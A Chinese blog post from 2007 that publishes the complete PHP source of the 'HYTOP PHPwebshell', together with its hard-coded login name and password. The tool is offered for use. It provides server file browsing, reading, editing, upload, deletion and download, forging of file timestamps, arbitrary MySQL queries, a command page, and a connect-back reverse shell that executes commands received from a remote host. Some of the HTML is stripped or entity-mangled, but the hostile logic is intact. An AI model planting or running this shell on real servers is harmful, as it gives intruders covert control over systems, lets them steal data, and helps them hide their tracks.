首页 > 编程地带 > PHP-webshell

PHP-webshell

2007年10月23日 发表评论 阅读评论


用户名:lcx  密码:123

<br /><?php<br />/**<br />Thk:angle maple-x wwofeiwo Netpath<br />HYTOP PHPwebshell 0.0001ver only test windows2003+APMServ5.2.0<br />**/<br />error_reporting(1);<br />$adminu      = "lcx";<br />$adminp      = "202cb962ac59075b964b07152d234b70";<br />$url=$_SERVER&#91;&#039;PHP_SELF&#039;&#93;;<br /><br />if ($_POST&#91;&#039;sendadmin&#039;&#93; == &#039;Login&#039;) {<br />  <br />      if ( md5(trim($_POST&#91;&#039;adminpass&#039;&#93;))==$adminp&&trim($_POST&#91;&#039;adminuser&#039;&#93;)==$adminu) {<br />       setcookie ("adminpass",md5(trim($_POST&#91;&#039;adminpass&#039;&#93;)),time()+(1*24*36000));<br />       echo "<meta http-equiv=refresh content=0;URL=".$_SERVER&#91;&#039;PHP_SELF&#039;&#93;."?acton=path>";<br />       exit;<br />      }<br />}<br /><br />if (isset($_COOKIE&#91;&#039;adminpass&#039;&#93;)) {<br />      if ($_COOKIE&#91;&#039;adminpass&#039;&#93; != $adminp and trim($_POST&#91;&#039;adminuser&#039;&#93;) !=$adminu) {<br />       loginpage();<br />      }<br />} else {<br />      loginpage();<br />}<br /><br /><br />$downfile=$_GET&#91;&#039;downfilename&#039;&#93;;<br />if (!empty($downfile)) {<br />if (!@file_exists($downfile)) {<br />      echo "<script>alert(&#039;no exists!&#039;)</script>";<br />} else {<br />      $filename = basename($downfile);<br />      $filename_info = explode(&#039;.&#039;, $filename);<br />      $fileext = $filename_info&#91;count($filename_info)-1&#93;;<br />      @header(&#039;Content-type: application/x-&#039;.$fileext);<br />      @header(&#039;Content-Disposition: attachment; filename=&#039;.$filename);<br />      @header(&#039;Content-Description: PHP Generated Data&#039;);<br />      @header(&#039;Content-Length: &#039;.filesize($downfile));<br />      @readfile($downfile);<br />      exit;<br />}<br />}<br /><br />if ($_GET&#91;&#039;acton&#039;&#93;=="path"){<br />$sCwd = (substr(PHP_OS, 0, 3) == &#039;WIN&#039;) ? strtolower(getcwd()) : getcwd();<br />echo "webph:<br><a href=# onclick=&#92;"vbs:window.open &#039;$url?acton=list&page=$sCwd&#039;&#92;">$sCwd</a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=upload> upfile </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=cmd> cmd </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=phpinfo> phpinfo </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=mysql> mysql </a>&nbsp&nbsp<a href=$_SERVER&#91;PHP_SELF&#93;?acton=nc> ncshell </a><br>";<br /><br />$letters = range(&#039;b&#039;,&#039;z&#039;);echo "drive:<br>";<br />foreach($letters as $drive){<br />   <br />            if (is_dir($drive.&#039;:&#039;))<br />            {<br />                $freespace                 = disk_free_space($drive.&#039;:&#039;);<br />                $total_space             = disk_total_space($drive.&#039;:&#039;);<br />                $percentage_free         = $freespace ? round($freespace / $total_space, 2) * 100 : 0;<br />                $message=&#039;: &#039;.to_readble_size($freespace).&#039; / &#039;.to_readble_size($total_space).&#039; &#91;&#039;.$percentage_free.&#039;%&#93;&#039;;<br />       echo "<a href=# language=vbscript onclick=&#92;"window.open &#039;$url?acton=list&page=$drive:&#039;&#92;" >$drive</a>$message<br>";<br />        //echo "<a href=# onclick=&#92;"vbs:location.href=&#039;?acton=list&page=$drive:&#039;&#92;">$drive</a>$message<br>";<br /><br />   <br />            }<br />        }<br />}<br /><br /><br />if ($_GET&#91;&#039;acton&#039;&#93;=="read") {<br />echo "<form action=&#039;&#039; name=frm2 method=POST> <textarea name=textarea cols=100 rows=25 >";<br />$cls=htmlentities(file_get_contents($_GET&#91;&#039;filename&#039;&#93;));<br />echo $cls;<br />echo "</textarea><INPUT type=submit name=button2 value=edit></form><br>";<br /><br />if ($_POST&#91;&#039;button2&#039;&#93;=="edit") {<br />fputs(fopen($_GET&#91;&#039;filename&#039;&#93;,&#039;w&#039;), stripslashes($_POST&#91;&#039;textarea&#039;&#93;));<br />echo "<script language=vbs>msgbox(&#92;"ok,read again&#92;"):location.href=window.location.href</script>";<br />   <br />}<br />}<br /><br />if ($_GET&#91;&#039;acton&#039;&#93;=="upload") {<br />      echo "<form enctype=&#039;multipart/form-data&#039; action=&#039;&#039; method=&#039;POST&#039; name=frm3>";<br />         echo "<input type=&#039;hidden&#039; name=&#039;MAX_FILE_SIZE&#039; value=&#039;300000&#039; >";<br />      echo "upload path: <input name=&#039;uploadpath&#039; type=&#039;text&#039; value=&#039;c:/&#039;>";<br />         echo "Send this file: <input name=&#039;userfile&#039; type=&#039;file&#039; >";<br />         echo "<input type=&#039;submit&#039; value=&#039;SendFile&#039; name=button3 >";<br />         echo "</form>";<br /><br />      $uploaddir = $_POST&#91;&#039;uploadpath&#039;&#93;;<br />            $uploadfile = $uploaddir . basename($_FILES&#91;&#039;userfile&#039;&#93;&#91;&#039;name&#039;&#93;);<br />            echo &#039;<pre>&#039;;<br />          if (move_uploaded_file($_FILES&#91;&#039;userfile&#039;&#93;&#91;&#039;tmp_name&#039;&#93;, $uploadfile)) {<br />            echo "File is valid, and was successfully uploaded.&#92;n";<br />           } else {<br />          echo "Possible file upload attack!&#92;n";<br />           }<br /><br />echo &#039;Here is some more debugging info:&#039;;<br />print_r($_FILES);<br /><br />       echo "

“;

}

if ($_GET['acton']==”del”) {

@unlink($_GET['filename']);

}

if ($_GET['acton']==”copy”) {

copy($_GET['filename'],$_GET['newfile']);

}

if ($_GET['acton']==”move”) {

@rename($_GET['filename'],$_GET['newfile']);

}

if ($_GET['acton']==”list”) {
list_dir(stripslashes($_GET[page]));

}

if ($_GET['acton']==”phpinfo”) {
phpinfo();
}

if($_GET['acton']==”cfiletime”){
print<<

MODIFY:

YEAR
MONTH

DAY
HOUR
MINUTE
SECOND

eof;
if ($_POST['sure']==”sure”){
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
$time=strtotime(“$data $month $year $hour:$minute:$second”);
echo (@touch($_GET['cfile'],$time)) ? $_POST['curfile'].” CHANGE “.date(“Y-m-d H:i:s”,$time).” !” : “FALSE!”;
}
}

if ($_GET['acton']==”mysql”){
print<<









eof;

if ($_POST['mysql']==”mysql”){
mysql_connect(“$_POST[host]”, “$_POST[user]”, “$_POST[pass]”) or
die(“Could not connect: ” . mysql_error());
mysql_select_db(“$_POST[db]”);
$sql=stripslashes(“$_POST[sql]”);
$result = mysql_query(“$_POST[sql]”);
echo “

";
while ($row = mysql_fetch_array($result, MYSQL_BOTH)) {

for ($j=0; $j < count($row); $j++) {
printf (" $row[$j] ");
}
echo "
";
}
mysql_free_result($result);
}
}

if ($_GET['acton']=="cmd"){
print<<




";


if ($_GET['acton']=="nc"){
if(isset($_POST['host']) && isset($_POST['port']))
{
$host = $_POST['host'];
$port = $_POST['port'];
}else{
print<<

Host:

Port:

Linux
Win



eof;
print("-------------------------------------------------------------")."
";
print("注意:win的反弹需要PHP支持socket")."
";
print(" Linux在非源码编译安装的情况一般都会支持,具体查看phpinfo()")."
";
print(" 错误信息:win保存在当目录的log.txt,Linux为/tmp/log.txt")."
";
die("欢迎测试");
}
if($_POST['info']=="win")
{
$ph=str_replace(chr(92),chr(92).chr(92),$_SERVER['SystemRoot']).chr(92).chr(92)."system32" ;
$env=array('path' => $ph);
$descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
2 => array("file","log.txt","a"),
);
}else{
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
$descriptorspec = array(
0 => array("pipe","r"),
1 => array("pipe","w"),
2 => array("file","/tmp/log.txt","a"),
);
}
$host=gethostbyname($host);
$proto=getprotobyname("tcp");
if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
{
die("Socket Create Faile");
}
if(($ret=socket_connect($sock,$host,$port))<0)
{
die("Connect Faile");
}else{
$message="----------------------PHP Connect-Back--------------------\n";

socket_write($sock,$message,strlen($message));
$cwd=str_replace('\\','/',dirname(__FILE__));
while($cmd=socket_read($sock,65535,$proto))
{
if(trim(strtolower($cmd))=="exit")
{
socket_write($sock,"Bye Bye\n");
exit;
}else{

$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);

$msg=stream_get_contents($pipes[1]);
socket_write($sock,$msg,strlen($msg));
fclose($pipes[1]);
$return_value = proc_close($process);
}
}
}
}
}


function list_dir($path)
{

$dh = opendir($path);
while (($dir = readdir($dh)) !== false) {
$pathurl=urlencode($path);
$dirurl=urlencode($dir);
if ( $dir != "." && $dir != ".." ){


if (is_dir("$path/$dir") ){

echo "$path/$dir
";

}

elseif (!is_dir("$path/$dir"))

$ctime=date("Y-m-d H:i:s",filectime("$path/$dir"));
$mtime=date("Y-m-d H:i:s",filemtime("$path/$dir"));
$size=to_readble_size(filesize("$path/$dir"));
$fileperm=substr(base_convert(@fileperms("$path/$dir"),10,8),-4);
echo " $dir ($ctime) ($mtime)($size) ($fileperm) read copy del move&rename down
";


}
}


closedir($dh);
}

function to_readble_size($size)
{
switch (true)
{
case ($size > 1000000000000):
$size /= 1000000000000;
$suffix = 'TB';
break;
case ($size > 1000000000):
$size /= 1000000000;
$suffix = 'GB';
break;
case ($size > 1000000):
$size /= 1000000;
$suffix = 'MB';
break;
case ($size > 1000):
$size /= 1000;
$suffix = 'KB';
break;
default:
$suffix = 'B';
}
return round($size, 2).$suffix;
}

function loginpage() {
print<<







eof;

exit;
}?>


HYTOP PHPwebshell 0.0001ver code by lcx

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:PHP-webshell
本文地址:http://www.woyigui.cn/2007/10/23/phpwebshell/

分类: 编程地带 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*